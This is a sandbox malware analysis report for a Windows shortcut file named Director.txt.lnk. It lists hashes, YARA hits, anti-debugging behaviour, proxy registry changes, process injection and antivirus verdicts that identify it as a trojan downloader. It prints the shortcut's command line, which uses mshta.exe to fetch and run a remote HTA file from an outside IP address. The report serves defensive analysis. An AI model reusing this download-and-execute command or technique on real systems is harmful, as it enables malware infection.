Summary | ZeroBOX

Director.txt.lnk

Generic Malware AntiVM Lnk Format AntiDebug GIF Format
Category: FILE
Machine: s1_win7_x6402
Started: Aug. 12, 2024, 10:42 a.m.
Completed: Aug. 12, 2024, 10:45 a.m.
Size: 471.0B
Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Working directory, Has command line arguments, Icon number=0, ctime=Tue Jan 16 01:48:07 1601, mtime=Tue Jan 16 01:48:07 1601, atime=Tue Jan 16 01:48:07 1601, length=0, window=hidenormalshowminimized
MD5: a30762f283cb411be8f4ffaa2e183c4d
SHA256: 54c950899dbd8a02de99cb62f1dd5aeddc8fcaaf488f7f207e7871156d761083
CRC32: 5CA1179F
ssdeep: 6:4xt4/djjsT2FPr13RXXYhLwljAlltERueE8n+SkyGkRkTKlQyDdNdT8Jm7n+Sky1:8eoiPr13huQjAWuR8+UUyDh8I7+Uc6
Yara
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Lnk_Format_Zero - LNK Format
  • Generic_Malware_Zero - Generic Malware

Name / Response / Post-Analysis Lookup: No hosts contacted.
IP Address: 164.124.101.2, Status: Active, Action: Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

API: GlobalMemoryStatusEx
status: 1, return: 1, repeated: 0
API: NtProtectVirtualMemory
process_identifier: 292
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74052000
process_handle: 0xffffffff
status: 1, return: 0, repeated: 0

API: NtProtectVirtualMemory
process_identifier: 292
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73b33000
process_handle: 0xffffffff
status: 1, return: 0, repeated: 0
file: C:\Users\test22\AppData\Local\Temp\Director.txt.lnk
cmdline: "C:\Windows\System32\cmd.exe" /c mshta.exe http://192.168.207.2/Director.hta
cmdline: mshta.exe http://192.168.207.2/Director.hta
API: NtProtectVirtualMemory
process_identifier: 292
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
status: 1, return: 0, repeated: 0
  • DebuggerCheck__GlobalFlags - (no description)
  • DebuggerCheck__QueryInfo - (no description)
  • DebuggerHiding__Thread - (no description)
  • DebuggerHiding__Active - (no description)
  • DebuggerException__SetConsoleCtrl - (no description)
  • ThreadControl__Context - (no description)
  • SEH__vectored - (no description)
  • anti_dbg - Checks if being debugged
  • disable_dep - Bypass DEP
API: RegSetValueExA
key_handle: 0x000002d4
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
status: 1, return: 0, repeated: 0
API: RegSetValueExA
key_handle: 0x000002d4
regkey_r: ProxyOverride
reg_type: 1 (REG_SZ)
value: 127.0.0.1:16107;
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
status: 1, return: 0, repeated: 0
Process injection: Process 3040 resumed a thread in remote process 2200

API: NtResumeThread
thread_handle: 0x00000338
suspend_count: 1
process_identifier: 2200
status: 1, return: 0, repeated: 0
Lionic Trojan.WinLNK.Nioc.4!c
VIPRE Heur.BZC.YAX.Nioc.1.0A7EF40E
Sangfor Suspicious.Win32.Save.a
Arcabit Heur.BZC.YAX.Nioc.1.0A2AFAB0 [many]
Symantec Trojan.Gen.NPE.C
ESET-NOD32 LNK/TrojanDownloader.Agent.AVD
Avast Other:Malware-gen [Trj]
Kaspersky HEUR:Trojan.WinLNK.Agent.gen
BitDefender Heur.BZC.YAX.Nioc.1.0A7EF40E
MicroWorld-eScan Heur.BZC.YAX.Nioc.1.0A7EF40E
Rising Downloader.Mshta/LNK!1.BADA (CLASSIC)
Emsisoft Heur.BZC.YAX.Nioc.1.0A7EF40E (B)
FireEye Heur.BZC.YAX.Nioc.1.0A7EF40E
Sophos Troj/DownLnk-X
SentinelOne Static AI - Suspicious LNK
Google Detected
MAX malware (ai score=83)
Kingsoft Win32.Troj.Undef.a
Microsoft Trojan:Script/Wacatac.B!ml
ZoneAlarm HEUR:Trojan.WinLNK.Agent.gen
GData Heur.BZC.YAX.Nioc.1.11B631AB
VBA32 Trojan.Link.CmdRunner
Tencent Win32.Trojan-Downloader.Der.Uwhl
huorong TrojanDownloader/LNK.Agent.cr
AVG Other:Malware-gen [Trj]
dead_host: 192.168.207.2:80